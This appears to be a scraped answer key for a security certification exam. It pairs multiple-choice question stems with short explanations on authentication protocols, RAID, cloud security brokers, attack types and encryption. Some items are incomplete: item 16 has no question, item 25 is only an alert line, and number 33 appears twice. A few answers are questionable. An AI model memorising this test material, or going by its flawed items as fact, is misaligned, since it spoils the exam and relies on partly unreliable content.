Traffic cannot be explicitly blocked; traffic can only be allowed with security groups.
1. A company is launching a new internal application that will not start until a username and
password are entered and a smart card is plugged into the computer. Which of the following BEST
describes this process?
Authentication - The process of proving who you say you are is authentication. In this example, the
password and smart card are two factors of authentication, and both reasonably prove that the
person logging in is authentic.
2. Sam, a security administrator, is configuring the authentication process used by technicians
when logging into a router. Instead of using accounts that are local to the router, Sam would like
to pass all login requests to a centralized database. Which of the following would be the BEST
way to implement this requirement?
The RADIUS (Remote Authentication Dial-In User Service) protocol is a common method of centralizing
authentication for users. Instead of having separate local accounts on different devices, users can
authenticate with account information that is maintained in a centralized database.
3. A recent security audit has discovered email addresses and passwords located in a packet
capture. Which of the following did the audit identify?
An insecure protocol will transmit information "in the clear," or without any type of encryption or
protection.
4. A security administrator is designing a storage array that would maintain an exact replica of all
data without striping. The array needs to operate normally if a single drive was to fail. Which of
the following would be the BEST choice for this storage system?
RAID (Redundant Array of Independent Disks) type 1 maintains a mirror (or exact duplicate) of data
across multiple drives. If a single drive was to fail, the mirror would continue to operate with the
redundant data.
5. A transportation company has moved their reservation system to a cloud-based infrastructure.
The security manager would like to monitor data transfers, identify potential threats, and
ensure that all data transfers are encrypted. Which of the following would be the BEST choice
for these requirements?
A CASB (Cloud Access Security Broker) is used to implement and manage security policies when working
in a cloud-based environment.
6. A security administrator attends an annual industry convention with other security professionals
from around the world. Which of the following attacks would be MOST likely in this situation?
A watering hole attack infects a third-party visited by the intended victims. An industry convention
would be a perfect location to attack security professionals.
7. Sam, a security administrator, is configuring an IPsec tunnel to a remote site. Which protocol
should she enable to protect all of the data traversing the VPN tunnel?
The ESP (Encapsulation Security Payload) protocol encrypts the data that traverses the VPN.
8. A government transport service has installed access points that support WPA3. Which of the
following technologies would provide enhanced security for PSK while using WPA3?
SAE - WPA3 (Wi-Fi Protected Access 3) enhances the PSK (Pre-Shared Key) authentication process by
privately deriving session keys instead of sending the key hashes across the network.
9. Which of the following vulnerabilities would be the MOST significant security concern when
protecting against a competitor?
One of the easiest ways for a competitor to obtain information is through an existing Internet
connection. An unpatched server could be exploited to obtain customer data that would not normally
be available otherwise.
10. A third-party vulnerability scan reports that a company's web server software version is
susceptible to a memory leak vulnerability. Which of the following would be the expected result
if this vulnerability was exploited?
A DDoS (Distributed Denial of Service) can easily exploit a memory leak. Unused memory is not
properly released, and eventually the leak uses all available memory. The system eventually crashes due
to lack of resources.
11. Which of the following applies scientific principles to provide a post-event analysis of an
intrusion?
The diamond model was created by the United States intelligence community as a way to standardize
the attack reporting and the analysis of the intrusions.
12. Which of the following would be the MOST likely result of plaintext application communication?
To perform a replay attack, the attacker needs to capture the original non-encrypted content. If an
application is not using encrypted communication, the data capture process is a simple process for the
attacker.
13. A security administrator is updating the network infrastructure to support 802.1X
authentication. Which of the following would be the BEST choice for this configuration?
LDAP (Lightweight Directory Access Protocol) is a common protocol to use for centralized
authentication. Other protocols such as RADIUS, TACACS+, or Kerberos would also be valid options for
802.1X authentication.
14. Last month, a finance company disposed of seven-year-old printed customer account
summaries that were no longer required for auditing purposes. A recent online search has now
found that images of these documents are available as downloadable torrents. Which of the
following would MOST likely have prevented this information breach?
Pulping places the papers into a large washing tank to remove the ink, and the paper is broken down
into pulp and recycled. The information on the paper is not recoverable after pulping.
15. A security manager believes that an employee is using their laptop to circumvent the corporate
Internet security controls through the use of a cellular hotspot. Which of the following could be
used to validate this belief?
If the laptop is not communicating across the corporate network, then the only evidence of the traffic
would be contained on the laptop itself. A HIPS (Host-based Intrusion Prevention System) and host-based
firewall logs may contain information about recent traffic flows to systems outside of the
corporate network.
16.
The duplicate MAC (Media Access Control) address from 192.168.1.1 and 192.168.1.103 indicates MAC
spoofing or ARP (Address Resolution Protocol) poisoning. There should not be duplicate MAC
addresses associated with two IP addresses on the same subnet.
17. A security administrator has identified an internally developed application that allows users to
modify SQL queries through a web-based front-end. To prevent this modification, the
administrator has recommended that all queries be completely removed from the application
front-end and placed onto the back-end of the application server. Which of the following would
describe this implementation?
Stored procedures are SQL queries that execute on the server side instead of the client application. The
client application calls the stored procedure on the server, and this prevents the client from making any
changes to the actual SQL queries.
18. A security administrator is concerned that a user may have installed a rogue access point on the
corporate network. Which of the following could be used to confirm this suspicion?
A rogue access point would be difficult to identify once it’s on the network, but at some point the access
point would need to physically connect to the corporate network. An analysis of switch interface
activity would be able to identify any new devices and their MAC addresses.
19. A system administrator has installed a new firewall between the corporate user network and the
data center network. When the firewall is turned on with the default settings, users complain
that the application in the data center is no longer working. Which of the following would be the
BEST way to correct this application issue?
Create firewall rules that match the application traffic flow = By default, firewalls implicitly deny all
traffic. Firewall rules must be built that match the traffic flows, and only then will traffic pass through
the firewall.
20. A server administrator is building a new web server and needs to provide operating system
access to the web server executable. Which of the following account types should be
configured?
A service account is commonly used by local services on a system, but service accounts are not generally
enabled for interactive logins. Web servers, database servers, and other local servers use service
accounts.
21. Which of the following would be the MOST effective use of asymmetric encryption?
Securely derive a session key = The Diffie-Hellman process can combine public and private keys to
derive the same session key on both sides of a conversation without sending that session key across the
network.
22. Which of these protocols use TLS to provide secure communication?
TLS (Transport Layer Security) is a cryptographic protocol used to encrypt network communication.
HTTPS is the Hypertext Transfer Protocol over TLS, and FTPS is the File Transfer Protocol over TLS.
An earlier version of TLS is SSL (Secure Sockets Layer). Although we don’t commonly see SSL in use any
longer, you may see TLS communication referenced as SSL.
23. An IPS at your company has found a sharp increase in traffic from all-in-one printers. After
researching, your security team has found a vulnerability associated with these devices that
allows the device to be remotely controlled by a third-party. Which category would BEST
describe these devices?
An all-in-one printer that can print, scan, and fax is often categorized as an MFD (Multifunction Device).
24. Which of the following standards provides information on privacy and managing PII?
ISO 27701
25. Gateway Anti-Virus Alert: XPACK.A_7854 (Trojan) blocked
A download was blocked from a web server
26. Your connection is not private. NET::ERR_CERT_INVALID Which of the following attacks would
be the MOST likely reason for this message?
An on-path attack is often associated with a third-party who is actively intercepting network traffic. This
entity in the middle would not be able to provide a valid SSL certificate for a third-party website, and
this error would appear in the browser as a warning.
27. Which of the following would be the BEST way to provide a website login using existing
credentials from a third-party site? – Federation; Federation would allow members of one
organization to authenticate using the credentials of another organization.
28. A security administrator has been using EAP-FAST wireless authentication since the migration
from WEP to WPA2. The company’s network team now needs to support additional
authentication protocols inside of an encrypted tunnel. Which of the following would meet the
network team’s requirements?
EAP-TTLS (Extensible Authentication Protocol - Tunneled Transport Layer Security) allows the use of
multiple authentication protocols transported inside of an encrypted TLS (Transport Layer Security)
tunnel. This allows the use of any authentication while maintaining confidentiality with TLS.
29. Which of the following would be commonly provided by a CASB?
A list of applications in use & Verification of encrypted data transfers
30. A company would like to protect the data stored on laptops used in the field. Which of the
following would be the BEST choice for this requirement?
SED (Self encrypting drive)
31. A network administrator would like each user to authenticate with their personal username and
password when connecting to the company's wireless network. Which of the following should
the network administrator configure on the wireless access points?
802.1X uses a centralized authentication server, and all users can use their normal credentials to
authenticate to an 802.1X network.
32. A manufacturing company has moved an inventory application from their internal systems to a
PaaS service. Which of the following would be the BEST way to manage security policies on this
new service?
A CASB (Cloud Access Security Broker) is used to manage compliance with security policies when using
cloud-based applications.
33. A security administrator needs to identify all references to a Javascript file in the HTML of a
web page. Which of the following tools should be used to view the source of the web page and search
through the file for a specific filename?
Grep & curl
33. A security administrator is collecting information associated with a ransomware infection on the
company's web servers. Which of the following log files would provide information regarding
the memory contents of these servers?
Dump - A dump file contains the contents of system memory. In Windows, this file can be created from
the Task Manager.
34. Which part of the PC startup process verifies the digital signature of the OS kernel?
Trusted Boot
35. Which of the following would be the BEST way to confirm the secure baseline of a deployed
application instance?
An integrity measurement is designed to check for the secure baseline of firewall settings, patch levels,
operating system versions, and any other security components associated with the application. These
secure baselines may vary between different application versions.
36. A security administrator is designing an authentication process for a new remote site
deployment. They would like the users to provide their credentials when they authenticate in
the morning, and they do not want any additional authentication requests to appear during the
rest of the day. Which of the following should be used to meet this requirement?
Kerberos uses a ticket-based system to provide SSO (Single Sign-On) functionality. You only need to
authenticate once with Kerberos to gain access to multiple resources.
37. An MSP is designing a new server room for a large company. Which of the following should be
included in the design to provide redundancy?
RAID (Redundant Array of Independent Disks) and dual power supplies can both provide uptime and
availability if a drive or component fails. Many RAID configurations can continue to operate if a drive
fails, and a system with two power supplies can continue to operate if one of those was to fail.
38. An organization maintains a large database of customer information for sales tracking and
customer support. Which person in the organization would be responsible for managing the
access rights to this data?
The data custodian manages access rights and sets security controls to the data.
39. A corporate security team would like to consolidate and protect the certificates across all of
their web servers. Which of these would be the BEST way to securely store these certificates?
An HSM (Hardware Security Module) is a high-end cryptographic hardware appliance that can securely
store keys and certificates for all devices.
40. A security manager has created a report showing intermittent network communication
from external IP addresses to certain workstations on the internal network. These
traffic patterns occur at random times during the day. Which of the following would be
the MOST likely reason for these traffic patterns?
A backdoor would allow an attacker to access a system at any time without any user intervention. If
there are inbound traffic flows that cannot be identified, it may be necessary to isolate that computer
and examine it for signs of a compromised system.
41. A company's outgoing email server currently uses SMTP with no encryption. The security
administrator would like to implement encryption between email clients without changing the
existing server-to-server communication. Which of the following would be the BEST way to
implement this requirement?
S/MIME (Secure/Multipurpose Internet Mail Extensions) provides a way to integrate public key
encryption and digital signatures into most modern email clients. This would encrypt all email
information from client to client, regardless of the communication used between email servers.